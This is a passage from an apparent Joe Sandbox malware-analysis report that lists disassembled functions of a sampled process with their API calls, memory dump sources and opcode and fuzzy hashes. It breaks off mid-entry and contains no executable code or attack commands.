                                        • Opcode ID: c6268522bac48a251f637cfa0f153cbfceedaf3265ede37bc91d330f3dee9409
                                        • Instruction ID: 69b0275aa0c8d1d8e6a3344349f2bd356952680279110a7c1bf544cecb1f79af
                                        • Opcode Fuzzy Hash: c6268522bac48a251f637cfa0f153cbfceedaf3265ede37bc91d330f3dee9409
                                        • Instruction Fuzzy Hash: 6E1143B18002098FDB20DF9AC548BEEFBF4EB48320F108469E958A7340C738A944CFA4
                                        Function 02D415B8 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • ResumeThread.KERNELBASE(?), ref: 02D4161A
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2165156552.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_2d40000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: ResumeThread
                                        • String ID:
                                        • API String ID: 947044025-0
                                        • Opcode ID: b561185b8baf5cf85269bbf7d3a286397de3cee3ea5d930a0bc305d16042716d
                                        • Instruction ID: 51f8fdd5558a91e3b066214cdb6a66defce5bbd89963631cf6226cadeb3bf884
                                        • Opcode Fuzzy Hash: b561185b8baf5cf85269bbf7d3a286397de3cee3ea5d930a0bc305d16042716d
                                        • Instruction Fuzzy Hash: C11125B19002498BCB20DFAAC4457AFFBF5EF88324F248819D519A7240CB79A944CBA4
                                        Function 02D45258 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 02D452BD
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2165156552.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_2d40000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: MessagePost
                                        • String ID:
                                        • API String ID: 410705778-0
                                        • Opcode ID: 1fc0460cedb935ded53a76ac4cfe847dd7bdbc171835f7f3d6dae4b237f3ae43
                                        • Instruction ID: 2fff7983421fa1f3c7bb14871a273e7b206f1c3bcda62373cf36b27f13a27318
                                        • Opcode Fuzzy Hash: 1fc0460cedb935ded53a76ac4cfe847dd7bdbc171835f7f3d6dae4b237f3ae43
                                        • Instruction Fuzzy Hash: 0D1102B5800389DFDB10DF99D485BEEBFF4EB59314F10844AE959A7600C379A944CFA1
                                        Function 02D42E6C Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 02D452BD
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2165156552.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_2d40000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: MessagePost
                                        • String ID:
                                        • API String ID: 410705778-0
                                        • Opcode ID: 9ee472cd1d2e5b7207c116a041098d9be54eb22bdce6044fb21d945cca520371
                                        • Instruction ID: 7a27e5f38bd50f5bf02d7e1592a4bcfa450e3059bcc5a721855f0a9d1e429e23
                                        • Opcode Fuzzy Hash: 9ee472cd1d2e5b7207c116a041098d9be54eb22bdce6044fb21d945cca520371
                                        • Instruction Fuzzy Hash: 451122B59003489FCB10DF8AD888BDFBBF8EB58314F10845AE918A3300C379A944CFA0
                                        Function 02E0AF98 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 02E0AFFE
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2165281235.0000000002E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_2e00000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: HandleModule
                                        • String ID:
                                        • API String ID: 4139908857-0
                                        • Opcode ID: f9125d7cd8792157c9dddbf83a7f1d90b4eaf45b2102726d3401a0a70891f40f
                                        • Instruction ID: d4e663ff5d925d6498d43796eaa5a89067f408a4e30307ec8d4dd6392d375082
                                        • Opcode Fuzzy Hash: f9125d7cd8792157c9dddbf83a7f1d90b4eaf45b2102726d3401a0a70891f40f
                                        • Instruction Fuzzy Hash: 52110FB6C002498FCB10CF9AC444A9EFBF4BB88318F10846AD529A7250C379A545CFA1
                                        Function 07483528 Relevance: 1.5, Strings: 1, Instructions: 234COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2169708930.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7480000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Haq
                                        • API String ID: 0-725504367
                                        • Opcode ID: 4a5b051cb9f79a9e0ce9f90d4ebdd8d35f5e82fe81d3ce2c27fb724135f3f57f
                                        • Instruction ID: 92a7832e5dd862b7c166ca4f1c4c3eb465bbcc39b737e7b7dc6fc4f79a520c3d
                                        • Opcode Fuzzy Hash: 4a5b051cb9f79a9e0ce9f90d4ebdd8d35f5e82fe81d3ce2c27fb724135f3f57f
                                        • Instruction Fuzzy Hash: 3B914074A002599FCB05DFA8C4909EEBBF6EF89704B14C0AAE805EB355E735DD06CB91
                                        Function 0748CC78 Relevance: 1.4, Strings: 1, Instructions: 169COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2169708930.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7480000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: r
                                        • API String ID: 0-1812594589
                                        • Opcode ID: e0d1b15255ee4dc5df56890b74e9de0c19520ee44538d038a38d8d331302b19e
                                        • Instruction ID: c884ed142077015214edaab5d0c83bc6c6460f38cd5809d30f1a5d6d4e50d268
                                        • Opcode Fuzzy Hash: e0d1b15255ee4dc5df56890b74e9de0c19520ee44538d038a38d8d331302b19e
                                        • Instruction Fuzzy Hash: 3D61F8B4D29108CBDB44EFA9C0845EDFBBABB4E301F14D5AAE419A6251D7309946CF70
                                        Function 07483B04 Relevance: 1.4, Strings: 1, Instructions: 152COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2169708930.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7480000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Te]q
                                        • API String ID: 0-52440209
                                        • Opcode ID: ca5e32ea21b86d5f15e428bebfe2251204af11165debd068f034ae619978829a
                                        • Instruction ID: 2bf39156160d962f6c04c3cbb282714e9f021a9eaa03ac2d996924935961d45e
                                        • Opcode Fuzzy Hash: ca5e32ea21b86d5f15e428bebfe2251204af11165debd068f034ae619978829a
                                        • Instruction Fuzzy Hash: E4419E71B0021A8FCB54EF6998849AFBBF6EFC4720B15896AE419D7391EF309C058791
                                        Function 0748323A Relevance: 1.3, Strings: 1, Instructions: 76COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2169708930.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7480000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4']q
                                        • API String ID: 0-1259897404
                                        • Opcode ID: 28796900306d26a9c43e7e45ede1f04d456959b75bb8b7a6883444514e3ffb3f
                                        • Instruction ID: c702893682e4dfbf8996fb466190298059e3ed5f5ee89c42d3cb6efbb0915770
                                        • Opcode Fuzzy Hash: 28796900306d26a9c43e7e45ede1f04d456959b75bb8b7a6883444514e3ffb3f
                                        • Instruction Fuzzy Hash: 8921A1317402258BD714DB69D480AEFBBE6FFC8B00F10846AE548DB391DA719C468BD1
                                        Function 0748B328 Relevance: 1.3, Strings: 1, Instructions: 61COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2169708930.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7480000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Te]q
                                        • API String ID: 0-52440209
                                        • Opcode ID: 852ef131a156a6a82987a2f5972067c9949312e0d7a0b6d04df20b001233265f
                                        • Instruction ID: 8351d0fb7d314575a7e711774f3fb70538edcc009a34fff0a7ec0e055eabde84
                                        • Opcode Fuzzy Hash: 852ef131a156a6a82987a2f5972067c9949312e0d7a0b6d04df20b001233265f
                                        • Instruction Fuzzy Hash: 3721E8B0D1464C8BDB18DFEAC4556EEBBF6EF89700F14842AD419AB354DB701946CB80
                                        Function 07486908 Relevance: 1.3, Strings: 1, Instructions: 58COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2169708930.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7480000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Te]q
                                        • API String ID: 0-52440209
                                        • Opcode ID: 488648c3c6aecb89762275bfc7e8e750bf67f633a46a082d43a2dc473fc95c2e
                                        • Instruction ID: d5ff57fbb7a59902ed63337891296877d60935f1d0f8a889a094c29dc6752a1d
                                        • Opcode Fuzzy Hash: 488648c3c6aecb89762275bfc7e8e750bf67f633a46a082d43a2dc473fc95c2e
                                        • Instruction Fuzzy Hash: 95114271B0011ACBCB84EFA999115FFB7F6ABC5610F10446AC405E7344EB318D02CB96
                                        Function 0748279F Relevance: .3, Instructions: 299COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2169708930.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7480000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 785b67d3157aa5642f31e582cd008d18dbeacd595d48a60f7dde2e74c334212d
                                        • Instruction ID: 21f005ce26749891a50a0eb81034e269b425fbac499c9e10f7fe766b6ee910be
                                        • Opcode Fuzzy Hash: 785b67d3157aa5642f31e582cd008d18dbeacd595d48a60f7dde2e74c334212d
                                        • Instruction Fuzzy Hash: 08B19F756146048FC309EB78D498ADE7BE6FF89300B5584AED05ACB371DB30E94ACB91
                                        Function 07482E16 Relevance: .3, Instructions: 259COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2169708930.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7480000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 81eb56a7ca7c9e24e3382677dca0c07f34a79bdd091c87ec69ca4927d5c5b9a7
                                        • Instruction ID: 6a4b3d63762209d986ee2ef815de24b529906a6fc302dac33149f474b50ca709
                                        • Opcode Fuzzy Hash: 81eb56a7ca7c9e24e3382677dca0c07f34a79bdd091c87ec69ca4927d5c5b9a7
                                        • Instruction Fuzzy Hash: E6A16C71614A048FC309EB78D494ADE7BE6FF89300B5585AED05ACB371DA30E94ACB91
                                        Function 07482E56 Relevance: .2, Instructions: 244COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2169708930.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7480000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a62a869f228ffcafc9c25f80a8524a4a08f66971adeca777d28973ebf22d4702
                                        • Instruction ID: 736c3c949ba23befedfdf6ddbf8a3290f7902c4d130c1c7699be795e6a256c4e
                                        • Opcode Fuzzy Hash: a62a869f228ffcafc9c25f80a8524a4a08f66971adeca777d28973ebf22d4702
                                        • Instruction Fuzzy Hash: 6A914E746146048FC709EB78D494A9A7BE6EF89300B5585AED04A8B371DF30ED4ACB91
                                        Function 07482EB0 Relevance: .2, Instructions: 196COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2169708930.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7480000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3b63b4848db1664620fe2312f74acd6de6e8da0de0f06e858b3ac94c119112fb
                                        • Instruction ID: e41644a08d7eae13476ddf0b2aec497cb4cac5ccb0dbef89217527094a0abdd0
                                        • Opcode Fuzzy Hash: 3b63b4848db1664620fe2312f74acd6de6e8da0de0f06e858b3ac94c119112fb
                                        • Instruction Fuzzy Hash: D1812874610A048FC349EB78D594AAEB7E6EFC9300B50846DD01A8B374EF31ED4ACB91
                                        Function 07484C87 Relevance: .1, Instructions: 138COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2169708930.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7480000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 15fdd5b269772107fb808779279a380ef29925052103c4e6cff2db7ef3ea6a63
                                        • Instruction ID: 30940495cc914fc299b2ffed78c6c5d8362b1e8fb977ff3b7eb4295bcac74db7
                                        • Opcode Fuzzy Hash: 15fdd5b269772107fb808779279a380ef29925052103c4e6cff2db7ef3ea6a63
                                        • Instruction Fuzzy Hash: 1151B0B4909685CFC306DF69E554998BFF0AF8A201B2A84D6D484CB273DB359D19CB13
                                        Function 0748BE80 Relevance: .1, Instructions: 133COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2169708930.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7480000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f3b63fcf283307b573c6e51de84dbd9ae763a78c53f1008d0ffcc891c29e1bee
                                        • Instruction ID: 1d136635c5249226ea7a2f4ae7d367a4f06e3f40b264ddc7f48258a4b7bd5e6e
                                        • Opcode Fuzzy Hash: f3b63fcf283307b573c6e51de84dbd9ae763a78c53f1008d0ffcc891c29e1bee
                                        • Instruction Fuzzy Hash: 6241D7F4E18109CFCB44EB99C484AEEBBB5FB89320F049566EA09E7351D7309985CF50
                                        Function 0748BB40 Relevance: .1, Instructions: 129COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2169708930.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7480000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4e151205390ba81c6b624cc066749fde233427a15ffb3103e659b215d89e81dd
                                        • Instruction ID: 648b661855626580e1a49dc64689a2b510b938d01a7a0710080ba651f571ef02
                                        • Opcode Fuzzy Hash: 4e151205390ba81c6b624cc066749fde233427a15ffb3103e659b215d89e81dd
                                        • Instruction Fuzzy Hash: 804137B0E1820D8FDB48DFAAD4546FEBBF6EB8A301F04D42AE419A2255DB345942CB54
                                        Function 07484E3A Relevance: .1, Instructions: 124COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2169708930.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7480000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 17a0b721e238a329597fae5603d792b8ff3a9fbafe48f80e65016292d5c79a0c
                                        • Instruction ID: d288a080c5a8632db8a6584b505c53c70a0f8530f0e2572645961dd4c3a31b67
                                        • Opcode Fuzzy Hash: 17a0b721e238a329597fae5603d792b8ff3a9fbafe48f80e65016292d5c79a0c
                                        • Instruction Fuzzy Hash: 0941E4B4D2925ADFCB80EFA8E4848FEBBB4FB4E310F01585AE556A7311D7309815CB64
                                        Function 07484E48 Relevance: .1, Instructions: 117COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2169708930.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7480000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1db0f9c1d018b0c5b4170d49c2226f87f1bef870990c0ac820d9756657ce399e
                                        • Instruction ID: 1d80c28bccb3c36d972a5b0443bea42ede1114328443e884858d643557a0d397
                                        • Opcode Fuzzy Hash: 1db0f9c1d018b0c5b4170d49c2226f87f1bef870990c0ac820d9756657ce399e
                                        • Instruction Fuzzy Hash: 8741C4B4D2925EDFCB80EFA8E4848FEBBB4FB4E210F41585AE516A7311D7309815CB64
                                        Function 0748570B Relevance: .1, Instructions: 108COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2169708930.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7480000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 16e1ddca5aeed86d00728cbdd3f9cc77d67bc7586a222c1e682a285bde6466a9
                                        • Instruction ID: d6af79f63928bb6684b3987ceee096a9ba7dca6bf880fb83af9847e525ccf8f4
                                        • Opcode Fuzzy Hash: 16e1ddca5aeed86d00728cbdd3f9cc77d67bc7586a222c1e682a285bde6466a9
                                        • Instruction Fuzzy Hash: 16418AB4E1421DDFCB45DFA9D984AEEFBB2BB0A300F509426E81AF7210DB349951DB14
                                        Function 07484FC6 Relevance: .1, Instructions: 104COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2169708930.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7480000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bf5cb4841e232492bb2609d838c7851709a311c2d64da184c95fe41c209a5f81
                                        • Instruction ID: 8c18549c8ce81ca80747f8507021828a8345554f82b87be336003e6392ac98d5
                                        • Opcode Fuzzy Hash: bf5cb4841e232492bb2609d838c7851709a311c2d64da184c95fe41c209a5f81
                                        • Instruction Fuzzy Hash: 6641E4B4D2925EDFCB80EFA8E4848FDBBB4FB4E301F01585AE516A7211DB309911CB24
                                        Function 0748729C Relevance: .1, Instructions: 103COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2169708930.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7480000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6798d84fe0d924e2ef3efadfc895ae32b1522705c619b7ce2156841e902bb9e8
                                        • Instruction ID: 503f31eb9453ffd2908ee649403553300c0492902791c6306feb7eb68c715063
                                        • Opcode Fuzzy Hash: 6798d84fe0d924e2ef3efadfc895ae32b1522705c619b7ce2156841e902bb9e8
                                        • Instruction Fuzzy Hash: E63106A07842994BCB4977BD446C1BF299BDFD5240B64546FDA06CB3C1DE24CC02C3A6
                                        Function 07483518 Relevance: .1, Instructions: 98COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2169708930.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7480000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6c682dcf30e2712c6f9476cf21dfc087bdccacd86fbd053e5e70c26118211acf
                                        • Instruction ID: bddca80c2b66bb0d5a66135058805bc9091fc0a01abc6b84c1a5c649ff5870c7
                                        • Opcode Fuzzy Hash: 6c682dcf30e2712c6f9476cf21dfc087bdccacd86fbd053e5e70c26118211acf
                                        • Instruction Fuzzy Hash: EE31A275A001498FCB05DFA4C994AEE7BF6EF49700F1580AAE905AB361DB35ED05CF50
                                        Function 074872D4 Relevance: .1, Instructions: 98COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2169708930.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7480000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 70e624d71d2049bb2f69fcd282d088c7491193bba760fee0d2aa568401f40a7f
                                        • Instruction ID: cbac2b26395a55e93f0ae73378a6f12e5d75727cf6ae8d58c2b9b336f4a503ef
                                        • Opcode Fuzzy Hash: 70e624d71d2049bb2f69fcd282d088c7491193bba760fee0d2aa568401f40a7f
                                        • Instruction Fuzzy Hash: E83139B1900209AFCF54EFA9D844ADEBFF9EF48310F10842AE519E7350D735A944CBA5
                                        Function 02C6D1FC Relevance: .1, Instructions: 76COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2164388466.0000000002C6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C6D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_2c6d000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 406c80540a491e9d8a4b87f7f70cdbd4a6abd5fc60e515a50c43d90ea1323b6e
                                        • Instruction ID: 4eb5d87067e19caff09c649e5ba40f35ec1342df20bd533d22f85d2c57ea1d5e
                                        • Opcode Fuzzy Hash: 406c80540a491e9d8a4b87f7f70cdbd4a6abd5fc60e515a50c43d90ea1323b6e
                                        • Instruction Fuzzy Hash: 9021D3B1604244DFDB05DF54D9C8B36BFA5FBC8314F24C5A9E90A0B256C33AD856CBA1
                                        Function 02C7D1D4 Relevance: .1, Instructions: 72COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2164529336.0000000002C7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C7D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_2c7d000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d1005275e506d9f532f6577e7b806b04793a602fb2195baa4d67b39bcebd38a0
                                        • Instruction ID: 252b9413ecd7c1481645800895557936a10e138ddfb487f2274d06c681afec20
                                        • Opcode Fuzzy Hash: d1005275e506d9f532f6577e7b806b04793a602fb2195baa4d67b39bcebd38a0
                                        • Instruction Fuzzy Hash: 3421CF71604204EFDB05DF64D9C0B26BBA5FF98314F24C6ADE94A4B296C33AD847CA61
                                        Function 02C7D01C Relevance: .1, Instructions: 72COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2164529336.0000000002C7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C7D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_2c7d000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 48778dc26558bc9a96e895c9648b454c13673dd2132d406416991874130259de
                                        • Instruction ID: ef1f6e334c2c1d452101b9eb8ba2026bf037588f2098bd0fc14d07f4c565dc10
                                        • Opcode Fuzzy Hash: 48778dc26558bc9a96e895c9648b454c13673dd2132d406416991874130259de
                                        • Instruction Fuzzy Hash: 7421FF75604204DFDB14DF24D9C4B26BFA5FF88314F24C5ADE90A4B296C33AD807CAA2
                                        Function 07483170 Relevance: .1, Instructions: 70COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2169708930.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7480000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 734b3cd902a478d6b11c2678801735ccd9fda7f0da72fbbce9f8384e2f294dc4
                                        • Instruction ID: 14cad256540662de8dbfd2051bbc3bb17a4650e13b2232f6843b2c7003e725af
                                        • Opcode Fuzzy Hash: 734b3cd902a478d6b11c2678801735ccd9fda7f0da72fbbce9f8384e2f294dc4
                                        • Instruction Fuzzy Hash: 63216DB5A007158FC311CF65C980ABBB7F9FF88700B00896ED419DB320E734A945CBA1
                                        Function 07481430 Relevance: .1, Instructions: 68COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2169708930.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7480000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b3a881de2bb70ac98541ebcc0fd3fcca4090cb7601236450bcea7a43b5c90b0a
                                        • Instruction ID: a3eb1a3c19729830025c0f1df290ce66acd0596f29173a4327372274dab8197b
                                        • Opcode Fuzzy Hash: b3a881de2bb70ac98541ebcc0fd3fcca4090cb7601236450bcea7a43b5c90b0a
                                        • Instruction Fuzzy Hash: B8112971344A954BC3158B2A9C105ABBFEAEFC6B51709C8AFD149C7261EB349C068791
                                        Function 07486FEA Relevance: .1, Instructions: 67COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2169708930.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7480000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 59477d8330efa80ad2dfd17b3d0b51819bb50baf6ed27b2dba50daa51fa7dc00
                                        • Instruction ID: ff08d05a1db3a5e78b40350e5ef3fe5eb6c87defaf14cdba32f3c9022b50ab54
                                        • Opcode Fuzzy Hash: 59477d8330efa80ad2dfd17b3d0b51819bb50baf6ed27b2dba50daa51fa7dc00
                                        • Instruction Fuzzy Hash: F021C2B16042598FD750DF5AC444BEFBBF5FF89320F25816AE5189B391C7348904CBA1
                                        Function 07483CA4 Relevance: .1, Instructions: 67COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2169708930.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7480000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 858e7e8cbaf5a0ba5f980eea671f55450b0414283312dd8a57ed7322b1e69b14
                                        • Instruction ID: 87d9652d74a758c322a769afac4c01ab75dbc0f002a387625cf738d8642adc0e
                                        • Opcode Fuzzy Hash: 858e7e8cbaf5a0ba5f980eea671f55450b0414283312dd8a57ed7322b1e69b14
                                        • Instruction Fuzzy Hash: 9A31DFB0C0121C9BDB60DF99C588BDEBBF5EB08714F20845AE408AB341C7B55845CBA1
                                        Function 07483180 Relevance: .1, Instructions: 66COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2169708930.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7480000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5c7018a47d9424f589d72b3e844d04fd639ed1017ba51aa3feb58c8913006f1c
                                        • Instruction ID: 0b0130d593d5d9bb465b8a0ecbe366e0d1ab79076318da581bf08ada15e32c09
